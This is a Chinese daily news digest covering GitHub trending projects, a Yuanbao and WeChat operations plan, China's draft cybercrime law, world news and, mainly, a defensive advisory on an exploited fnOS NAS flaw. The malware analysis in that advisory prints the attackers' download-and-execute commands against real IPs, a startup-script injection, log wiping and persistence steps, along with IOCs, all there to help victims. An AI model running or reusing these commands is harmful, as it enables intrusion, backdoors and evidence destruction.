2026-02-02 打工人日报

2026-02-02 打工人日报

GitHub 热门榜单

排名 1:/openclaw/openclaw

排名 2:/ThePrimeagen/99

排名 3:/pedramamini/Maestro

排名 4:/kovidgoyal/calibre

排名 5:/badlogic/pi-mono

排名 6:/thedotmack/claude-mem

  • 简介: 一个Claude Code插件,可以自动捕获Claude在编码会话中所做的一切,用AI压缩(使用Claude的代理sdk),并将相关上下文注入到未来的会话中。
  • URL: https://github.com/thedotmack/claude-mem
  • 作者: thedotmack

排名 7:/microsoft/agent-lightning

排名 8:/amantus-ai/vibetunnel

排名 9:/steipete/CodexBar

排名 10:/j178/prek

排名 11:/vita-epfl/Stable-Video-Infinity

v2ex 热门帖子

热点新闻

🖼 🌏 #全球要闻速览 2026-02-01

🌏 #全球要闻速览 2026-02-01

↩️🎬 关于飞牛系统(fnOS)无需认证远程代码执行漏洞链的复现

LoopDNS资讯播报:

请立即停止公网暴露 fnOS Web 管理页面 我们通过联系多位遭遇入侵的用户并分析相关记录发现,本次针对 fnOS 的漏洞利用活动呈现多团伙、多基础设施特征:疑似存在 2–3 个利用团伙,攻击流程较为成熟,并观察到多个 C2(命令与控制)域名用于回连与任务下发。当前已明确捕捉到 DDoS 攻击指令,被入侵设备存在被纳入僵尸网络风险。 根据网络空间测绘(网站空间)统计,全网可直接访问并暴露 fnOS Web 页面设备约 306,766 台。 注意:该数字来自公开测绘快照,受扫描时间点、动态公网 IP…

关于飞牛系统(fnOS)无需认证远程代码执行漏洞链的复现

经过分析与验证,我们已成功复现飞牛系统(fnOS)中的一个严重远程代码执行(RCE)漏洞链。该漏洞链允许攻击者在无需任何身份验证的情况下,远程获取设备的最高管理员(root)权限,从而完全控制设备。

测试环境: FnOS 1.1.14

我们成功复现的攻击链由以下四个关键漏洞构成:

1. 漏洞一:路径穿越(任意文件读取)

描述:系统的一个Web接口(/app-center-static/serviceicon/myapp/...)未能正确过滤用户输入的路径,允许攻击者读取服务器文件系统上的任意文件。
在此攻击链中的作用:用于下载一个伪装成RSA私钥、但实际内嵌了硬编码AES密钥的文件 (/usr/trim/etc/rsa_private_key.pem)。这是整个攻击的起点。

2. 漏洞二:硬编码的加密密钥

描述:上述下载的文件中,在固定偏移量(100字节处)硬编码了一个32字节的AES主密钥(Root Key)。
在此攻击链中的作用:为攻击者提供了“万能钥匙”。这是后续伪造合法用户凭证的核心要素。

3. 漏洞三:认证绕过(通过伪造Token)

描述:系统的WebSocket网关在验证用户身份时存在致命逻辑缺陷。它允许攻击者使用上述获取的AES主密钥,在本地凭空“创造”出一个服务器会认为是合法的临时token。
在此攻击链中的作用:攻击者利用此漏洞,无需任何用户名和密码,即可伪造出一个“已登录”的管理员身份,从而有权调用需要高权限的API接口。

4. 漏洞四:命令注入

描述:在通过认证后,一个用于添加Docker镜像的API接口(appcgi.dockermgr.systemMirrorAdd)未能正确处理其url参数。
在此攻击链中的作用:这是最终的执行环节。攻击者将恶意系统命令(如反弹Shell或下载执行脚本)注入到url参数中,服务器在处理该请求时会无条件执行这些命令

Video is too big

一、元宝运营规划

一、元宝运营规划

元宝2026年的核心运营目标是:日活(DAU)达到2200万,其中除夕当天冲刺3800万,2月月活(MAU)目标为1.2亿。

商业化方面,计划于3月到5月开启广告变现测试,通过直接嵌入答案(GEO)等方式,覆盖本地生活、美妆、教育等主要行业。收入目标方面,10月到12月期间力争实现15亿收入。

二、元宝产品后续规划

生态定位上,元宝将构建“陌生人加少量熟人”的社交生态。

产品功能上,计划在春节期间推出AI情感陪伴数字人,赋予其性格特征,打造具备长期记忆和情感关怀的数字灵魂伴侣,主要面向Z世代用户。后续还将探索AR虚实融合玩法以及“AR人生合伙人”等创新概念。

三、元宝推广经费预算

除已公布的10亿红包活动外,另有5.5亿预算用于精准触达和口碑裂变等推广活动。具体分配如下:

- 微信生态及其他流量渠道:2.2亿
- KOL/KOC种草及内容营销:1.65亿
- 内容与UGC运营:8000万
- 线下推广:5500万,主要用于触达下沉市场和家庭用户
- 备用金:2750万

总计,3月到12月的推广预算约为15亿,全年推广费用预计在33亿左右。

四、微信Agent功能更新计划

1. 智能消息管理:微信将于2月15日上线聊天智能筛选功能。
2. 智能任务分解:3月底完成,其中2月底将支持聊天文件智能处理,实现关键数据提取。例如,对销售代表发送的Excel表格进行分析并生成格式化图表。
3. 小程序裂变层:6月份灰度上线。
4. 服务链闭环优化:持续进行。
5. 数据孪生构建服务:通过分析朋友圈和聊天记录了解用户喜好,用于个性化服务。例如,若用户每周五有聚餐习惯,系统将在下个周五自动推送相关优惠券和餐厅推荐。

公安部就《网络犯罪防治法》草案征求意见

公安部就《网络犯罪防治法》草案征求意见

公安部就《网络犯罪防治法》草案征求意见,规管全体中国公民和向中国境内提供服务者。

网络虚拟定位、远程控制工具的制作者应当向主管部门备案,并登记使用者的真实身份信息。

不得提供有偿删帖(屏蔽、替换、下沉信息)服务,平台处理删除违法信息申请时不得变相收费。

不得为已被“依法依规”封禁的内容或即时通信账号提供解封等技术支持或帮助。不得无正当理由大量持有非本人注册的账号。

不得在他人设立的非法支付平台上流转资金,不得在他人设立的淫秽赌博网站上投放广告。

不得植入用户无法卸载或未经用户同意的非基本功能软件。

跨境黑灰产受刑事处罚者,地级以上公安机关可决定其在出狱后0.5~3年内不准出境。

境外个人利用网络信息损害国家主权安全的,有关部门可以冻结财产、限制入境。

消息来源: 中华人民共和国公安部 / 竹新社

↩️🖼 请立即停止公网暴露 fnOS Web 管理页面

LoopDNS资讯播报:

重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件 漏洞编号:暂无(官方未公开 / 未分配 CVE) 重要等级:严重(高危) CVSS 分数:暂无 影响范围: fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。 论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发) 受影响系统:…

请立即停止公网暴露 fnOS Web 管理页面

我们通过联系多位遭遇入侵的用户并分析相关记录发现,本次针对 fnOS 的漏洞利用活动呈现多团伙、多基础设施特征:疑似存在 2–3 个利用团伙,攻击流程较为成熟,并观察到多个 C2(命令与控制)域名用于回连与任务下发。当前已明确捕捉到 DDoS 攻击指令,被入侵设备存在被纳入僵尸网络风险。


根据网络空间测绘(网站空间)统计,全网可直接访问并暴露 fnOS Web 页面设备约 306,766 台。

注意:该数字来自公开测绘快照,受扫描时间点、动态公网 IP、端口映射/反代、去重口径等影响,实际暴露规模可能与该值不一致,仅用于风险态势评估。


时间线

最早入侵记录:约 12 天前(1 月 19 日左右)

用户察觉异常:约 10 天前(1 月 21 日左右),主要因设备出现对外异常行为(含对外攻击/连接异常增多)导致网络不稳定而被发现

1 月 21–22 日期间观测到任务/指令下发行为


综合判断:攻击者至少利用了约 3–4 天“空窗期” 在用户察觉前完成感染、持久化与回连准备

官方侧:据反馈,官方约在 1 月 21 日左右因用户集中反映“建立大量连接、网络不稳定”等现象,才进一步定位并确认漏洞风险

强调

所有用户立刻停止公网暴露 fnOS Web 管理页面。

这是当前最关键、最有效的止损措施。无论是否升级、是否自查“暂未发现异常”,都不要再让 Web 管理面可被公网直接访问。


“升级到新版本”并不等于风险解除。
目前无法确认新版本已覆盖全部修复点,仅依赖升级不能作为安全保证;在 Web 仍暴露公网的情况下仍可能被再次利用或二次入侵。


官方目前未公开可复用、可验证的完整处置方案。

因此不建议在联网状态下“边运行边清理”。

不要指望“屏蔽某个 IP / 屏蔽单个 C2 域名”解决问题。
已确认存在多个 C2 域名/基础设施轮换,单点封堵不一定有效,且可能快速失效。

已捕捉到 DDoS 指令:被控设备可能被用来对外攻击。
这不仅会造成你的网络被打满、设备性能异常、业务不可用,也可能引发运营商封禁。


处置

A1. 未发现入侵迹象的用户:
1.立即关闭公网访问,撤销端口映射/公网反代/暴露端口;仅允许内网访问,或使用 VPN/零信任网关进入内网后访问管理面;在网关处限制来源 IP(最小化暴露面)。
2.持续监控


再次强调:未中招用户也不要再暴露 Web。“没被打到”不代表安全,反而意味着资产仍处于可被扫描与补种的窗口内。

A2.已疑似/确认中招的用户
第一步:立刻断网隔离(物理断网优先)。
不要让设备继续联网回连 C2,也不要让其继续执行任务或触发 DDoS。

第二步:在断网环境下清除与排查(不要边联网边操作)。
中招用户共识建议:离线状态下进行木马清除、检查并处理定时任务/计划任务、启动项、可疑账号与权限、异常容器/进程、异常文件变更等持久化点。

第三步:清理完成前不要恢复联网。
在缺乏完整、可验证的清除方案前,贸然联网可能导致再次回连、二次下发任务或触发破坏行为。

第四步:保留日志与证据。

↩️ 目前我们已向相关服务商发送 Abuse 邮件,要求对涉事基础设施进行停用/下线处理,但截至发稿仍未收到有效回复或处置结果。为降低继续外联与二阶段下载风险…

LoopDNS资讯播报:

重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件 漏洞编号:暂无(官方未公开 / 未分配 CVE) 重要等级:严重(高危) CVSS 分数:暂无 影响范围: fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。 论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发) 受影响系统:…

目前我们已向相关服务商发送 Abuse 邮件,要求对涉事基础设施进行停用/下线处理,但截至发稿仍未收到有效回复或处置结果。为降低继续外联与二阶段下载风险,建议受影响用户在网关/防火墙侧立即手动封禁以下 IOC(域名与 IP),并同时开启出站日志记录以便后续溯源与复核:

域名:aura[.]kabot[.]icu
IP:20[.]89[.]168[.]131
IP:45[.]95[.]212[.]102
IP:151[.]240[.]13[.]91

重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件

重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件

漏洞编号:暂无(官方未公开 / 未分配 CVE)
重要等级:严重(高危)
CVSS 分数:暂无

影响范围:
fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发)

受影响系统:
fnOS(版本范围未公开)。官方社区回复称该问题官方已知,建议升级至 1.1.15,并在关闭公网端口映射后验证异常上传/连接是否停止。

木马行为分析
目前LoopDNS频道编辑已获取相关木马文件,下为行为分析

1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行
下载二阶段载荷并执行(观测到的命令链)

cd /tmp
wget http://20.89.168.131/nginx
chmod 777 nginx
head -c 16 /dev/urandom >> nginx(向文件追加随机字节,改变哈希,规避基于哈希的检测)
./nginx
wget http://20.89.168.131/trim_https_cgi
chmod 777 trim_https_cgi
head -c 16 /dev/urandom >> trim_https_cgi
./trim_https_cgi
外联与拉取补充组件
HTTP:GET http://151.240.13.91/trim_fnos
TCP:连接 45.95.212.102:6608


2.后门驻留组件 gots

A1. 写入后门主体与持久化文件
创建/写入:/sbin/gots
创建/写入:/etc/rc.local、/etc/rc.d/rc.local
创建/写入 systemd 服务(变种服务名):
/etc/systemd/system/x86.service
/etc/systemd/system/<sha256>.service
执行持久化:systemctl enable <service>.service(含重定向到 /dev/null 的静默执行)
自身复制/改名落地:
/usr/bin/x86(样本发生目录重命名/落地)
/usr/bin/<sha256>(样本发生目录重命名/落地)


A2. C2 通信与探测
DNS:解析 aura.kabot.icu -> 45.95.212.102
TCP:连接 45.95.212.102 多端口(观测到:3489、5098、6608、7489)
论坛样本显示的附加行为(strings/排查结论)
干扰系统工具:重命名/替换 cat(出现 mv /usr/bin/cat /usr/bin/cat2 等字符串,导致“cat 丢失”现象)
结束系统进程:pkill -f 'network_service|resmon_service'
修改持久化入口:改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
外联:包含 45.95.212.102 字符串并进行访问


3. 组件 trim_https_cgi

清理痕迹
清空多目录日志:/var/log/*、/usr/trim/logs/*、/run/log/journal 等
删除审计日志:/var/log/audit/audit.log 及滚动文件
删除/清理安全相关日志:/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等

干扰业务与恢复功能
结束服务:pkill -f backup_service、pkill -f sysrestore_service 等

二阶段下载执行与启动脚本注入
修改 /usr/trim/bin/system_startup.sh,追加下载执行链:
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
端口相关痕迹与疑似隐藏监听(来源于论坛排查)
目标系统存在 0.0.0.0:57132 LISTEN,ss/netstat 无 PID,lsof/fuser 无结果
trim_https_cgi 字符串包含 57132,并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑(提示该端口为其链路的一部分)


4.内核模块 snd_pcap(论坛排查)
/etc/modules 被追加 snd_pcap
模块文件:/lib/modules/6.12.18-trim/snd_pcap.ko
与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑(疑似内核层隐藏/驻留能力)


关键落地痕迹
不可变属性(immutable,需先 chattr -i 才能删除):

/usr/bin/nginx
/usr/sbin/gots
/usr/trim/bin/trim_https_cgi
/etc/systemd/system/nginx.service
/etc/systemd/system/trim_https_cgi.service
/etc/rc.local

伪装/复用:/usr/bin/nginx 与 /usr/sbin/gots md5 相同(同一载荷多名称投放)
rc.local 自启:/sbin/gots x86 &
systemd 自启(示例):ExecStart=/usr/bin/nginx x86(oneshot + enable)


可疑网络基础设施(IOC)
IP:45[.]95[.]212[.]102(C2/多端口连接)
IP:151[.]240[.]13[.]91(HTTP 拉取二阶段:/trim_fnos、论坛样本)
域名:aura[.]kabot[.]icu(解析到 45[.]95[.]212[.]102)
下载源:20[.]89[.]168[.]131(HTTP 拉取:/nginx、/trim_https_cgi)
归属信息:45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段


处置建议
1. 关闭公网端口映射/源站直通。
2. 升级 fnOS 至官方建议版本(1.1.15 或更高)。
3. 出口防火墙封禁:45.95.212.102、151.240.13.91,同时监控连接数与上传是否回落。
4. 轮换所有管理口令/密钥;检查容器、计划任务、数据盘是否存在触发残留(官方提示“重装后仍可能再次触发”)。

参考来源:飞牛社区

热点新闻

热点新闻

巴基斯坦俾路支省发生多起“恐怖分子”的自杀式和枪击袭击。 当局表示,袭击几乎同时在全省各地爆发,目标包括平民、监狱、警局和准军事设施,造成包括平民在内…

巴基斯坦俾路支省发生多起“恐怖分子”的自杀式和枪击袭击。
当局表示,袭击几乎同时在全省各地爆发,目标包括平民、监狱、警局和准军事设施,造成包括平民在内的33人死亡,释放了30多名囚犯。安全部队在反击中打死92名袭击者。
“俾路支解放武装”声称对袭击负责。巴基斯坦指责袭击得到了印度的支持。印度此前曾否认此类指控。
美联社

一名全国人大代表1月29日深夜在法国遭窃贼入屋盗窃,损失超700万欧元财物。 法国检方表示,案发于巴黎高级住宅区第16区,受害人在住所睡觉时遭窃贼袭击,被抢走…

一名全国人大代表1月29日深夜在法国遭窃贼入屋盗窃,损失超700万欧元财物。
法国检方表示,案发于巴黎高级住宅区第16区,受害人在住所睡觉时遭窃贼袭击,被抢走名表、珠宝等贵重物品,估计损失达700万欧元。
受害人说头部受袭,两名窃贼事后逃去,警方说没有强行闯入的迹象,怀窃贼是盗用锁匙入室。
无线新闻法广

↩️ 公安部就《网络犯罪防治法》草案征求意见,规管全体中国公民和向中国境内提供服务者。 任何个人和组织不得违规制售提供设备、软件、工具、线路、服务,为他…

竹新社:

《国家网络身份认证公共服务管理办法》自7月15日起施行。相比征求意见稿,增加规定: 网号自愿推广,各政企单位应当保留提供现有的或者其他合法实名制方式。互联网平台应保障其他实名制方式享有同等服务。 网号服务可以向互联网平台提供未成年、老年人等年龄标识信息,以支持其履行相应的法律义务。 网号服务发生运行或数据安全事件时,应当及时告知用户。 截至目前,“国家网络身份认证”App累计下载1600万次,申领开通600万人,提供认证服务1250万次。 (中央网信办)

公安部就《网络犯罪防治法》草案征求意见,规管全体中国公民和向中国境内提供服务者。
任何个人和组织不得违规制售提供设备、软件、工具、线路、服务,为他人获取传播被阻断的境外违法信息提供技术支持或者帮助。
网络虚拟定位、远程控制工具的制作者应当向主管部门备案,并登记使用者的真实身份信息。
违反以上两条者,没收所得,并处所得一倍以上、50万(或所得十倍)以下罚款;情节严重的,并处十五日以下拘留。
不得提供有偿删帖(屏蔽、替换、下沉信息)服务,平台处理删除违法信息申请时不得变相收费。
不得为已被“依法依规”封禁的内容或即时通信账号提供解封等技术支持或帮助。不得无正当理由大量持有非本人注册的账号。
不得在他人设立的非法支付平台上流转资金,不得在他人设立的淫秽赌博网站上投放广告。
不得植入用户无法卸载或未经用户同意的非基本功能软件。
跨境黑灰产受刑事处罚者,地级以上公安机关可决定其在出狱后0.5~3年内不准出境。
境外个人利用网络信息损害国家主权安全的,有关部门可以冻结财产、限制入境。
中国公安部

↩️ 中共中央政治局1月30日下午第24次集体学习“前瞻布局和发展未来产业”,信通院院长余晓晖主讲。 习近平讲话:综合考虑国家战略需求、技术成熟程度、要素支…

竹新社:

中共中央政治局12月25、26日开年终民主生活会,5道检讨题目分别是“强化政治忠诚、提高政治能力”“固本培元、增强党性”“敬畏人民、敬畏组织、敬畏法纪”“干事创业、担当作为”“扛起管党治党责任”。 习近平逐一点评并总结:要深入基层一线,注意倾听不同声音,做到对实情心中有数。安守本分,如临如履,怀德自重。严格遵守议事决策规则,自觉按制度规矩办事。 二十届中纪委五次全会已定于1月12–14日召开。 (新华社,视频:新闻联播)

中共中央政治局1月30日下午第24次集体学习“前瞻布局和发展未来产业”,信通院院长余晓晖主讲。
习近平讲话:综合考虑国家战略需求、技术成熟程度、要素支撑条件等因素,因地制宜、错位发展。
大力发展科技金融,全方位做好人才培养、引进、使用工作,在全社会营造鼓励创新的浓厚氛围。
探索科学有效的监管方式,防范相关风险。在国际积极推动各方标准共建、规则共商、产业共促。
新华社,视频:新闻联播

↩️ 应急管理部长王祥喜涉嫌严重违纪违法,现正接受中纪委审查调查。 王祥喜1962年生,2017年任湖北省政法委书记,2019年任国能集团董事长,2022年任应急管理部…

竹新社:

张冬辰(中国星网董事长)曹建国(中国航发董事长)刘国跃(国能集团董事长)马正武(中国融通原总经理)樊友山(中国电科原总经理)曾毅(中国电子董事长)俞培根(东方电气原董事长)王行环(武大中南医院院长),以上八人12月24日被撤销十四届全国政协委员资格。中纪委未曾披露过他们有无违纪违法。 中共12月22、23日开中央企业负责人会议,张国清主持,李强讲话,传达习近平指示。 (新华社,视频:新闻联播)

应急管理部长王祥喜涉嫌严重违纪违法,现正接受中纪委审查调查。
王祥喜1962年生,2017年任湖北省政法委书记,2019年任国能集团董事长,2022年任应急管理部长、党委书记(国家消防救援局第一政委)至今。二十届中央委员。
中央纪委国家监委

↩️ 美国参议院1月30日晚以71票赞成、29票反对的结果通过拨款法案。但由于众议院预计将于2月2日才能审议拨款法案,这意味着政府仍将短暂“停摆”。 参议院批准…

竹新社:

近日两起美国公民被枪杀案引发国会预算争议,并可能于周五午夜引发部分政府停摆。民主党议员拒绝批准移民执法行动预算,而共和党议员试图打包通过包括移民执法在内的六项预算案,总计占联邦政府运行 70% 以上。 枪击案引发共和党内分裂,部分共和党议员要求对枪击案进行调查。 而第二起重症护士被枪杀案,也引起了政府破坏拥枪权的争议。国土安全部长诺姆、联邦调查局局长帕特尔等官员,谴责被枪杀的普雷蒂其携带枪支参加抗议活动。边境巡逻队指挥官博维诺暗示普雷蒂“想要屠杀执法人员”。 但现场视频显示普雷蒂手持手机,帮助一名被执法人…

美国参议院1月30日晚以71票赞成、29票反对的结果通过拨款法案。但由于众议院预计将于2月2日才能审议拨款法案,这意味着政府仍将短暂“停摆”。
参议院批准的拨款法案将国土安全部的资金剥离出来。国土安全部的资金将临时延长2周,为国会两党对移民执法行动实施限制谈判提供时间。
美联社路透社

福利分享